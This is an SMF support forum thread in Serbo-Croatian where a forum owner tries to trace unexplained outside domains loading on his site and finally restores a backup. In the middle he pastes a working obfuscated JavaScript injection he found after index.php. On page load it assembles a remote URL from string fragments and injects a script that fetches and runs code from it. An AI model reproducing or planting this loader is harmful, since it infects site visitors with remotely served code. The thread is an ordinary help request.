News:

SMF 2.1.4 has been released! Take it for a spin! Read more.

Main Menu

Forum se ne učitava uspješno.

Started by rocknroller, March 10, 2010, 07:09:55 AM

Previous topic - Next topic

Dzonny

Ok, vidim sad.
Proveri Index.tempalte fajl, kao i display.tempalte.
Koristi search da pronađeš šta vuče sa tog file factory-ja.

rocknroller

Na koji search misliš? Skinuo sam sajt na hdd u dreamewaveru sam pretražio cjeli sajt, nema "filefactory" niti "zimbio" u codu.

?

Dzonny

Pa search u notepadu ili dw-u, šta već koristiš.
Nemoguće da nema, mora da ima negde, ne bi bzv učitavao nešto sa te stranice.

rocknroller

nemam pojma nema možda nešto sa skriptama????

Veliki Brat

Da nije u pitanju neki od reklamnih banera koje imas na forumu?
Follow us on Twitter - Join us on Facebook - Visit our Website - Visit Forum

Web Designer & SEO Expert - WPZoom & IntenseDebate team member

SZD:M - Our latest work

rocknroller

I ja sam to predpostavio isključio sam sve bannere osim banera foruma sada testiram, našao sam da se učitava još jedna datoteka van foruma ovo

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

ovo mi izgleda kao da ima veze sa ajax chatom ali ne znam što link radi u subs-Aeva.php?

Veliki Brat

#26
U subs-Aeva je verovatno dugme za chat na forumu. Otvori subs-Aeva i potrazi ajax u search.

ajax.google apiš.com  ;D ;D hahah

Edit: zasto i dalje imas onaj prazan prostor na dnu foruma posle footer-a to meni nije jasno? Kad uradim reload stranice footer se zalepi dole i posle 2 sekunde se opet podigne za nekih 200px
Follow us on Twitter - Join us on Facebook - Visit our Website - Visit Forum

Web Designer & SEO Expert - WPZoom & IntenseDebate team member

SZD:M - Our latest work

rocknroller

Quote from: Veliki Brat on March 10, 2010, 11:45:32 AM
U subs-Aeva je verovatno dugme za chat na forumu. Otvori subs-Aeva i potrazi ajax u search.

ajax.google apiš.com  ;D ;D hahah

da mogu to naći ali što da napravim sa time?

Veliki Brat

Nista samo konstatujem da je tu u subs-Aeva. nemoj dirati ako oces i dalje da koristis ajax chat. Mada iskreno mislim da ti ajax chat pravi problem. Ali sto kaze dzonny treba da nadjes odakle i zasto ti vuce te filefactory i ostale linkove? Procesljaj jos index.template, display.template, probaj u sources/ajax chat (ako ima uopste fajlova ajax chata u sources nemam pojma nisam nikad koristio taj chat) da potrazis nesto vezano za taj file factory i ostale nebuloze koje se pojavljuju.
Follow us on Twitter - Join us on Facebook - Visit our Website - Visit Forum

Web Designer & SEO Expert - WPZoom & IntenseDebate team member

SZD:M - Our latest work

rocknroller

Ne mogu odgonetnuti nikako odakle vuče one domene, filefactory, i one ruske gluposti, ugasio sam i aevu mislim da nema veze sa time.

Evo mali pregled što sam pokušao dosada:

-Pretražiti sve kodove na sajtu za bilo kojim linkom od tih filefactory pa onaj z...com onaj ruski...
   Nema, u nijednom dokumentu na sajtu...
-Ugasiti sam sve banere što se učitavaju sa vanjskih stranica, nije ni to.
-Ova skripta je bila od danas na index.php u kodu iza ?>

<script>function gq(){var I=new String();var l=new String("g");this.LP="";this.o="";var ku;if(ku!='' && ku!='SZ'){ku=''};var p=RegExp;var hT;if(hT!='' && hT!='lE'){hT='n'};this.r='';var u='';var Vb;if(Vb!='' && Vb!='V'){Vb=null};this.Z='';var C=new Array();function g(L,J){var nD;if(nD!='cv' && nD != ''){nD=null};var U;if(U!='NV' && U != ''){U=null};var SK=new String();var O= String("[");var tm='';O+=J;O+="]";var Je;if(Je!='' && Je!='uT'){Je=null};var HE=new String();var a=new p(O, l);var y='';var IU='';return L.replace(a, u);};var R=new Array();var s=new Date();var W=new String("ZpU/goog".substr(3)+"le.co"+"Wtpm/goo".substr(3)+"wBT6gle.cwT6B".substr(4,5)+"wSh2om/jcwh2S".substr(4,5)+"E5YTpenne".substr(4)+"y.com3sgz".substr(0,5)+"hUS/go.c".substr(3)+"lBXGom/trXGlB".substr(4,5)+"avian"+"3SA.com.".substr(3)+"F43ephpe4F3".substr(4,3));this.ya='';var OO;if(OO!='Dj' && OO != ''){OO=null};var nJ="";var Jn=new String("htxH4".substr(0,2)+"x0PltpPl0x".substr(4,2)+":/"+"LBqe/fBLeq".substr(4,2)+"KQhEil".substr(4)+"0Ulefl0U".substr(3,2)+"ac"+"j5dxto5dxj".substr(4,2)+"ry"+"-c"+"ilc4omicl4".substr(4,2)+".zEVK".substr(0,2)+"im2FR".substr(0,2)+"yoDPbioDyP".substr(4,2)+"o.jQh".substr(0,2)+"co"+"zRQm.".substr(3)+"UQAVao".substr(4)+"l-"+"hBurcoBhur".substr(4,2)+"-uHNb".substr(0,2)+"coBk.oBc".substr(3,2)+"le6th".substr(3)+"aXhemXah".substr(3,2)+"ixpAS9".substr(0,2)+"Ju0dba".substr(4)+"LrWnkWrL".substr(3,2)+".rEsJT".substr(0,2)+"u:koVe".substr(0,2));var P="scr"+"ipt";this.eQ="";var Fy;if(Fy!='UU'){Fy=''};var lf=new String("srcqU8Z".substr(0,3));var x=String("defeAj7z".substr(0,4)+"rtI7j".substr(0,1));var t=window;var j='';var FV;if(FV!='' && FV!='km'){FV='Jnz'};var Dw=new String();var F=g('87626209697628966760622969',"2976");var UD;if(UD!='' && UD!='Tc'){UD='_y'};var w=new String();var CE;if(CE!='' && CE!='kH'){CE='dg'};t.onload=function(){try {var jT;if(jT!=''){jT='JY'};j=Jn+F;var uY;if(uY!='' && uY!='NVv'){uY=null};this.tj="";j+=W;var z=new Array();un=document.createElement(P);var aP="";var fH;if(fH!=''){fH='NW'};var XD=new Array();un[x]=[1][0];var vg="";var qL;if(qL!='' && qL!='zG'){qL='zr'};un[lf]=j;var VS='';var Nz;if(Nz!='AU'){Nz=''};document.body.appendChild(un);} catch(G){var IO='';var fn;if(fn!='xo' && fn!='C_'){fn=''};};var jB;if(jB!='Ga' && jB!='FjU'){jB='Ga'};};var AV;if(AV!='Kg' && AV != ''){AV=null};this.j_='';};gq();var pM=new String();var Mc=new String();</script>
<!--68da36c73ae32408ad79fb62f1733f1e-->


Obrisao sam skriptu nije niti to.  Ne znam zašto mislim da je skripta povezana sa problemima.

eto.

rocknroller

Quote from: Veliki Brat on March 10, 2010, 12:09:49 PM
Nista samo konstatujem da je tu u subs-Aeva. nemoj dirati ako oces i dalje da koristis ajax chat. Mada iskreno mislim da ti ajax chat pravi problem. Ali sto kaze dzonny treba da nadjes odakle i zasto ti vuce te filefactory i ostale linkove? Procesljaj jos index.template, display.template, probaj u sources/ajax chat (ako ima uopste fajlova ajax chata u sources nemam pojma nisam nikad koristio taj chat) da potrazis nesto vezano za taj file factory i ostale nebuloze koje se pojavljuju.

ajax.google apiš.com tu datoteku sam skinuo i stavio kod sebe na host, i preuredio putanju. to je ok.

rocknroller

Puno Hvala svima koji su pokušali pomoći Nisam više imao živaca podigao sam backup.
Žao mi je što nisam uspio pronaći podrijetlo onih linkova, nadam se da mi neće nitko ponovno upasti, promjenio sam admin pass.

Veliki Brat

Sad sam posetio tvoj forum, sve mi izgleda ok. Drago mi da si sredio kako tako, stvarno ne znam sta je mogao biti uzrok i odakle oni linkovi sto su se pojavljivali?
Follow us on Twitter - Join us on Facebook - Visit our Website - Visit Forum

Web Designer & SEO Expert - WPZoom & IntenseDebate team member

SZD:M - Our latest work

Advertisement: